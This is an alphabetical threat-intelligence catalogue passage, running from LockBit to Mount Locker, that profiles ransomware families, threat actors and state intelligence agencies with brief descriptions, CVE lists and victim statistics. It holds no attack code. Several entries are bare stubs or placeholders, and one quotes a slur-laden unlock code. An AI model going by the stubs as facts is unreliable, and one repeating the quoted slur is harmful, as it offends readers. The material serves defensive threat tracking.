This object represents the LockBit Ransomware-as-a-Service ("RaaS") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects. Ransomware labeled "LockBit" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency ("CISA"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware's predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] Since emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] LockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via most methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to victim data encryption, LockBit actors routinely exfiltrate victim data and threaten to leak this data for extortion purposes. **Related Vulnerabilities**: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2021-22986, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]
LockBit
LockBit is a ransomware-as-a-service operation known for its fast encryption and double extortion tactics.
LockBox
ransomware
LockCrypt
LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.
Lockdata
Lockdata is an active extortion or ransomware group tracked by RansomLook.
Locked_File
ransomware
Locked-In Ransomware or NoValid Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on RemindMe
LockedByte
ransomware
Lockedv1
ransomware
Locker-Pay
ransomware
Locker
Ransomware has GUI
Lockergoga
Lockergoga is an active extortion or ransomware group tracked by RansomLook.
Lockify
ransomware
LockLock
Ransomware
LockMe
ransomware
LockOn
ransomware
Lockout
ransomware
Locky
Ransomware Affiliations with Dridex and Necurs botnets
Locus
Locus is an active extortion or ransomware group tracked by RansomLook.
LofyGang
LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts including Discord Inc. premium accounts, streaming services accounts such as Disney+ and Minecraft accounts.
Loki
ransomware
Lokilocker
Lokilocker is an active extortion or ransomware group tracked by RansomLook.
LolKek
ransomware
Lolnek
Lolnek is an active extortion or ransomware group tracked by RansomLook.
Lomix Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on the idiotic open-source ransomware called CryptoWire
Longhorn
Longhorn has been active since at least 2011. It has used a range of back door Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to cfr, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by Wikileaks under the name "Vault 7."
LongNosedGoblin
LongNosedGoblin is a China-aligned APT group targeting governmental entities in Southeast Asia and Japan for cyberespionage. The group employs Group Policy for malware deployment and utilizes cloud services like Microsoft OneDrive and Google Drive as C&C servers. Their operations feature a modular malware ecosystem, including backdoors, browser data stealers, and PowerShell-based downloaders that execute multi-stage payloads in memory. LongNosedGoblin's tactics emphasize reconnaissance-driven targeting and the abuse of trusted enterprise mechanisms, allowing for stealthy persistence within compromised networks.
LongTermMemoryLoss
ransomware
LonleyCrypt
ransomware
LooCipher
ransomware
LordOfShadow
ransomware
Lorenz Ransomware
Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems.
lorenz
Tesorion describes Lorenz as a ransomware with design and implementation flaws, leading to impossible decryption with tools provided by the attackers. A free decryptor for 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which again was provided a free decryptor, while the ransomware operators are not able to provide tools to decrypt affected files.
Lortok
Ransomware
Losers-Dangerous
ransomware
Losers
ransomware
Lost_Files
ransomware
Losttrust
Losttrust is an active extortion or ransomware group tracked by RansomLook.
LOTUS PANDA
Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia.
LoveLock Ransomware or Love2Lock Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
LoveServer Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker request your IP address in return for the decryption.
LowLevel04
Ransomware Prepends filenames
Lsd
Lsd is an active extortion or ransomware group tracked by RansomLook.
LuciferCrypt
ransomware
Luckbit
Luckbit is an active extortion or ransomware group tracked by RansomLook.
Lucky Cat
A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers for a conference (CFP). The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’ like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous.ænThe attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero day exploits or complicated threats, instead they rely on effective social engineering and lax security measures on the part of the victims.
Lucky Ransomware
Michael Gillespie discovered a new ransomware that renamed encrypted files to "[[email]][original].[random].lucky" and drops a ransom note named _How_To_Decrypt_My_File_.txt.
LuckyJoe
ransomware
Lucy
ransomware
LulzIntel
The threat actor lulzintel has claimed responsibility for multiple data breaches, including those of vegehome.pl, Almaex, Smaregi, and Kin Teck Tong, exposing sensitive information of over 400,000 individuals combined. The breaches involved the release of customer and patient records, including personal details and medical histories.Sample data has been provided to demonstrate the validity of the claims.
LulzSec Black
LulzSec Black is a hacktivist group that has claimed responsibility for coordinated DDoS attacks against Cyprus' government and critical infrastructure in response to the country's support for Israel. They have also announced cyberattacks targeting the UAE, including breaches of a government website and Alfa Electronics, asserting these actions are in support of Palestine. The group has indicated intentions for further attacks and has not provided independently verifiable evidence of their claims. Their operations reflect a focus on disrupting services and compromising data as part of their political agenda.
Lulzsec Muslims
Lulzsec Muslims is an active extortion or ransomware group tracked by RansomLook.
Luna Moth
Luna Moth conducts high-tempo callback phishing campaigns targeting legal and financial organizations in the U.S., using social engineering to lure victims into calling fake helpdesk numbers. Attackers impersonate IT staff to install legitimate RMM tools, enabling direct access to victim systems for data exfiltration. The group demands ransoms between $1 million and $8 million, threatening to leak stolen data if payments are not made. Their operations reflect a shift from traditional ransomware tactics to data breach extortion, leveraging trusted systems to evade detection.
Luna Ransomware
Ransomware
Luna Tempest
Microsoft threat actor profile. Origin/Threat: Financially motivated.
Lunalock
Lunalock is an active extortion or ransomware group tracked by RansomLook.
LUNAR SPIDER
According to CrowdStrike, this actor is using BokBok/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated withGrim Spider and Wizard Spider.
luoxk
Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.
Luxnut
ransomware
Lv
parser needs to be built
LYCEUM
Lyceum is an Iranian APT group that has been active since at least 2014. They primarily target Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum is known for using cyber espionage techniques and has been linked to other Iranian threat groups such as APT34. They have developed and deployed malware families like Shark and Milan, and have been observed using DNS tunneling and HTTPfor command and control communication.
Lynx
Lynx is an active ransomware-as-a-service operation tracked by RansomLook.
Lynxr
Lynxr is an active extortion or ransomware group tracked by RansomLook.
Lyrix
Lyrix is an active extortion or ransomware group tracked by RansomLook.
m3rx
m3rx is an active extortion or ransomware group tracked by RansomLook.
M4N1F3STO Ransomware (FAKE!!!!!)
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… FILES DON’T REALLY GET DELETED NOR DO THEY GET ENCRYPTED!!!!!!!
M4N1F3STO
Ransomware Does not encrypt Unlock code=suckmydicknigga
Mabahith
Mabahith (GDI) – المباحث العامة
Mabouia
Ransomware OS X ransomware (PoC)
MacAndChess
Ransomware Based on HiddenTear
MacRansom
A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.
Mad Liberator Ransomware Group
This object represents a collection of MITRE ATT&CK® Techniques and other objects related to the subject threat. Further contextual details are provided via the sources in the References tab below and any associated Tags.
mad liberator
Group is also currently known as MADDLL32 and Metatron.
Madafakah
ransomware
MadBit
ransomware
Madi
Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.
MAFIA Ransomware
The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.
MafiaWare Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 155$ inbitcoins. Creator of ransomware is called Mafia. Based on HiddenTear
MageCart
Digital threat management company RiskIQ tracks the activity of MageCart group and reported their use of web-based card skimmers since 2016.
Magic Kitten
Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.
Magic
Ransomware Based on EDA2
Magician
ransomware
MAGNETIC SPIDER
MAGNETIC SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Magniber Ransomware
Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber Ransomware. While many aspects of the Magniber Ransomware are different than Cerber, the payment system and the files it encrypts are very similar.
Mailto
Mailto is an active extortion or ransomware group tracked by RansomLook.
Main Directorate of Special Programs of the President of the Russian Federation
Main Directorate of Special Programs of the President of the Russian Federation (GUSP) – Главное управление специальных программ Президента Российской Федерации
Makop
ransomware
MaktubLocker
Ransomware
Malabu
ransomware
Malas
Malas is an active extortion or ransomware group tracked by RansomLook.
Malaysian Defence Intelligence Organisation
Malaysian Defence Intelligence Organisation (Military Intelligence)[16]
Malaysian Special Branch
Malaysian Special Branch (Police & Internal Intelligence)[17]
Malek Team
Malek Team is an active extortion or ransomware group tracked by RansomLook.
MalKamak
MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.
MALLARD SPIDER
Crowdstrike tarcks the operators behind the Qbot as MALLARD SPIDER
Mallox
Mallox is an active extortion or ransomware group tracked by RansomLook.
Malphas
Malphas is an active extortion or ransomware group tracked by RansomLook.
Malsmoke
Malsmoke primarily targets Japanese users through malvertising campaigns that deliver Zloader malware, often leveraging adult content lures and geographic IP information. The group has transitioned from exploit kits, such as Fallout, to social engineering tactics, including fake Java updates, while maintaining a focus on high-traffic adult websites. Their operations are characterized by the use of DGA for C2 server domains and the distribution of payloads via a custom loader, previously relying on Smoke Loader. Connections to past campaigns are evident through similarities in malware masquerading as Java plugins and shared registrar information among domains.
MalwareTech's CTF
ransomware
Mamona
Mamona is an active ransomware-as-a-service operation tracked by RansomLook.
Mana Team
Mana Team is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Mancros+AI4939
ransomware
Manifestus Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker demands 0.2 bitcoins. The ransomware poses as a Window update.
Maoloa
ransomware
Marine Corps Intelligence
Marine Corps Intelligence (MCI)
Mario Esxi
Mario Esxi is an active extortion or ransomware group tracked by RansomLook.
Markopolo
Markopolo is a threat actor known for running scams targeting cryptocurrency users through a fake app called Vortax. They use social media and a dedicated blog to legitimize their malicious activities. Markopolo has been linked to a credential-harvesting operation and is agile in pivoting to new scams when detected. The actor leverages shared hosting and C2 infrastructure for their malicious builds.
Marlboro Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is .2 bitcoin, however there is no point of even trying to pay, since this damage is irreversible. Once the ransom is paid the hacker does not return decrypt the files. Another name is DeMarlboro and it is written in language C++. Pretend to encrypt using RSA-2048 and AES-128 (really it’s just XOR)
Marozka
ransomware
MarraCrypt
ransomware
Mars
ransomware
MarsJoke
Ransomware
Massgrave
Massgrave is a hacking group that has developed a method to bypass Microsoft's software licensing for Windows and Office, enabling permanent activation of versions from Windows Vista to Windows 11. They are known for creating effective scripts for software activation, which are distributed through an unofficial repository at massgrave.dev. The group claims their exploit supports volume activation via the Key Management Services model and has gained traction within the piracy scene. Reports indicate that their tools may be used by unauthorized individuals, including Microsoft support agents, raising legal and security concerns.
MasterBuster Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Matrix
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…
Matroska
ransomware
Maui ransomware
Maui ransomware stand out because of a lack of several key features commonly seen with tooling from RaaS providers, such as an embedded ransom note to provide recovery instructions or automated means of transmitting encryption keys to attackers. Instead, it is believed that Maui is manually operated, in which operators will specify which files to encrypt when executing it and then exfiltrate the resulting runtime artifacts. There are many aspects to Maui ransomware that are unknown, including usage context.
MauriGo
ransomware
MaxiCrypt
ransomware
Maykolin
ransomware
Maysomware
ransomware
Maze
Maze is a ransomware operation known for being the first to implement double extortion tactics.
Mbc
Mbc is an active extortion or ransomware group tracked by RansomLook.
MBR-ONI
ransomware
MC Ransomware
Supposed joke ransomware, decrypt when running an exectable with the string "Minecraft"
Mcafee
Mcafee is an active extortion or ransomware group tracked by RansomLook.
mcrypt2019
mcrypt2019 is an active extortion or ransomware group tracked by RansomLook.
Medusa Ransomware Actors
Medusa is a ransomware operation that reportedly launched in June 2021. In 2023, the group launched a website used to publicize alleged victims. The group appears to be independent of the similarly named "MedusaLocker" operation.[[Bleeping Computer Medusa Ransomware March 12 2023](/references/21fe1d9e-17f1-49e2-b05f-78e9160f5414)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, Medusa actors publicly claimed around 90 victims through September 2023, ranking it ninth out of the 50+ ransomware operations in the dataset. These victims come from a wide variety of industry sectors and localities.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]
Medusa
Medusa is a long-time presence in the ransomware scene that stepped up its activities in late 2024, pushing past its previous limits.
MedusaLocker Ransomware Actors
MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)] This object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the "MedusaLocker Ransomware" Software object. **Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker
MedusaLocker
Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and the developer, who receives the remainder.
Meduza
ransomware
MegaCortex
Discovered in May 2019. dropped throught networks compromised by trojan like Emotet or TrickBot. Tools and methods used are similar to LockerGoga
MegaLocker
ransomware
Megazord
Megazord is an active extortion or ransomware group tracked by RansomLook.
Meister
Ransomware Targeting French victims
Meow
Meow is an active extortion or ransomware group tracked by RansomLook.
Mercury Ransomware
extension ".Mercury", note "!!!READ_IT!!!.txt" with 4 different 64-char hex as ID, 3 of which have dashes. Possible filemarker, same in different victim's files.
Merry Christmas
It’s directed to English and Italian speaking users, therefore is able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. They pose as a Consumer complaint notification that’s coming from Federal Trade Commission from USA, with an attached file called “complaint.pdf”. Written in Delphi by hacker MicrRP.
Mespinoza
Mespinoza ransomware is used at least since october 2018. First versions used the common extension ".locked". SInce december 2019 a new version in open sourced and documented, this new version uses the ".pyza" extension.
MetadataBin
ransomware
Metaencryptor
We are a group of young people who identify themselves as specialists in the field of network security with at least 15 years of experience. This blog and this work are ONLY commercial use, besides not the main one. We have nothing to do with politics, intelligence agencies and the NSB. If you are a hunter of other people's data, then download any files and (or) wait until the time expires for others and the files will be available here. If you have any personal suggestions, we are ready to consider them. Contact us on the "contacts" page. There are a lot of other data, for various reasons, not posted here and we can discuss their sale or transfer under certain conditions. Also, every incident is notified to all possible press in the region and data not intended for sale is transmitted to breached and similar forums. Subscribe to RSS, add to favorites, visit us more often.
Meteoritan
Ransomware
Mew767
ransomware
MI5
Security Service/MI5[33] – Domestic counter terrorism and counter espionage intelligence gathering and analysis.
Midas
This malware written in C# is a variant of the Thanos ransomware family and emerged in October 2021 and is obfuscated using SmartAssembly. In 2022, ThreatLabz analysed a report of Midas ransomware was slowly deployed over a two month period (ZScaler). This ransomware features also its own data leak site as part of its double extortion strategy.
miga
#MakeIsraelGreatAgain
Mijnal
ransomware
Mike NotSTOP
ransomware
Mikoyan
ransomware
Miliphen
Miliphen is an active extortion or ransomware group tracked by RansomLook.
Militärischer Abschirmdienst
Militärischer Abschirmdienst (MAD): Military Counterintelligence Service
Militärischer Nachrichtendienst
Military Intelligence Service - Militärischer Nachrichtendienst (MND)
Military intelligence and reconnaissance (Egypt)
Idarat al-Mukhabarat al-Harbyya wa al-Istitla (OMIR) (Office of Military Intelligence and Reconnaissance)
Military Intelligence Corps (Sri Lanka)
Military Intelligence Corps (Sri Lanka)
Military Intelligence Corps (United States Army)
Military Intelligence Corps (MIC)
Military Intelligence (Czech Republic)
Military Intelligence (Vojenské zpravodajství, VZ)
Military Intelligence Department
Military Intelligence Department
Military Intelligence Directorate (Israel)
Aman (Military intelligence)
Military Intelligence Directorate (Syria)
Military Intelligence Directorate
Military Intelligence(MI)
Military Intelligence(MI)
Military Intelligence (Pakistan)
Military Intelligence (MI)
Military Security Agency (Serbia)
Military Security Agency – Војнобезбедносна агенција (VBA)
Military Service for Security and Intelligence
Military Service for Security and Intelligence (Voena služba za razuznuvanje i bezbednost) (Military Agency) [1]
MilkmanVictory
ransomware
mimic-guram
Mimic v.10 Ransomware-as-a-Service (RaaS). The malware is designed to target various operating systems (Windows, ESXi, NAS, FreeBSD) and features network-wide deployment, file obfuscation, backup destruction, UAC bypass, and multithreaded encryption. The service offers additional tools like NTLM password decryption and call-based extortion. They prohibit attacks on CIS countries and require active participation, with decryption tools available for a fee currently 800USD.
MIMIC SPIDER
MIMIC SPIDER is mentioned in two summary reports only
Mimic
Mimic is an active extortion or ransomware group tracked by RansomLook.
MindLost
ransomware
MindSystem
ransomware
Mindware
Mindware is an active extortion or ransomware group tracked by RansomLook.
Mini
ransomware
Ministry for National Security (Turkmenistan)
Ministry for National Security (MNS)
Ministry of Defence (Austria)
Abwehramt (AbwA): Counter-Intelligence Office [2]
Ministry of Finance (India)
Economic Intelligence Council
Ministry of Intelligence (Iran)
Ministry of Intelligence (VAJA)
Ministry of Public Security (China)
Ministry of Public Security (MPS)
Ministry of State Security (China)
Ministry of State Security (MSS)
Ministry of State Security (North Korea)
Ministry of State Security[22]
Minotaur
ransomware
Minteye
Minteye is an active extortion or ransomware group tracked by RansomLook.
Mirage Tiger
Mirage Tiger is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
MIRCOP
Ransomware Prepends files Demands 48.48 BTC
MireWare
Ransomware Based on HiddenTear
MirrorFace
MirrorFace is a People's Republic of China (PRC)-aligned cyberespionage actor believed to be a subgroup under the menuPass umbrella based on targeting, tools, and infrastructure overlaps. MirrorFace has been active since at least 2019, at first exclusively targeting Japanese organizations across the media, defense, diplomatic, financial, manufacturing, and academic sectors. Subsequent MirrorFace operations included targets in Central Europe and featured use of LODEINFO, HiddenFace, and UPPERCUT malware. [Kaspersky LODEINFO OCT 2022](https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/) [Kaspersky LODEINFO Part II OCT 2022](https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/) [ESET MirrorFace DEC 2022](https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/) [JPCERT MirrorFace JUL 2024](https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html) [Trend Micro Earth Kasha NOV 2024](https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html) [Trend Micro Earth Kasha Updates APR 2025](https://www.trendmicro.com/en_us/research/25/d/earth-kasha-updates-ttps.html)
Mischa
Ransomware Packaged with Petya PDFBewerbungsmappe.exe
MM Locker
Ransomware Based on EDA2
MMM
ransomware
MNS CryptoLocker
ransomware
mnt6
mnt6 is an active extortion or ransomware group tracked by RansomLook.
Mobef-JustFun
ransomware
Mobef
Ransomware
Mocha Manakin
Mocha Manakin is a threat actor that employs the paste and run technique for initial access, tricking users into executing scripts that download various payloads, including LummaC2, HijackLoader, and Vidar. This actor is notable for utilizing a bespoke NodeJS-based backdoor named NodeInitRAT, which facilitates persistence and reconnaissance activities while communicating with adversary-controlled servers over HTTP. Mocha Manakin has been linked to Interlock ransomware, and while direct ransomware activity has not been observed, there is moderate confidence that unmitigated activity may lead to such outcomes. The effectiveness of paste and run lures, distributed through methods like phishing and web browser injects, has contributed to the actor's increased scope and scale.
ModifiedElephant
Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.
Mogilevich
Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland's Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich's tactics and website design suggest they may not be a sophisticated threat actor.
Moisha
Moisha is an active extortion or ransomware group tracked by RansomLook.
Molatori
Molatori is a threat actor group identified by Malwarebytes researchers, known for utilizing malicious ScreenConnect clients hosted on domains like atmolatori.icu and gomolatori.cyou. They employ phishing tactics, masquerading as communications from the Social Security Administration to lure targets into installing the client. Once installed, the ScreenConnect client allows the actors to remotely access the victim's computer, facilitating the exfiltration of sensitive information such as banking details and personal identification numbers. The primary objective of the Molatori group is financial fraud, leveraging the stolen data for identity theft and other malicious activities.
MoneroPay
ransomware
Money Message
Money Message is an active extortion or ransomware group tracked by RansomLook.
MoneyTaker
In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.
Mongo Lock
An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.
Monolock
Monolock is an active extortion or ransomware group tracked by RansomLook.
Monte
Monte is an active extortion or ransomware group tracked by RansomLook.
Monti
Monti is an active extortion or ransomware group tracked by RansomLook.
MONTY SPIDER
Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.
Monument
Ransomware Use the DarkLocker 5 porn screenlocker - Jigsaw variant
MoonCryptor
ransomware
Mora_001
Mora_001 is a threat actor exhibiting a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472 vulnerabilities affecting Fortinet devices. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or shared communication channels. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.
Mordor
ransomware
MORH4x
MORH4x is a self-proclaimed Moroccan hacking group that claimed responsibility for a data leak from Algeria's pharmaceutical industry ministry. The group announced the breach on the BreachForums website, stating that the leaked files span from 2019 to 2025 and include internal documents related to Algeria's pharmaceutical imports. This incident is part of a series of escalating cyberattacks between Moroccan and Algerian hacking groups.
Morpheus
Morpheus is an active extortion or ransomware group tracked by RansomLook.
MorrisBatchCrypt
ransomware
Mortalkombat
Mortalkombat is an active extortion or ransomware group tracked by RansomLook.
Moshen Dragon
Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.
Moskalvzapoe
Moskalvzapoe is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Mossad
Mossad (Foreign Intelligence and Special Operations)
MOTD Ransomware
About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Moth
ransomware
Mount Locker
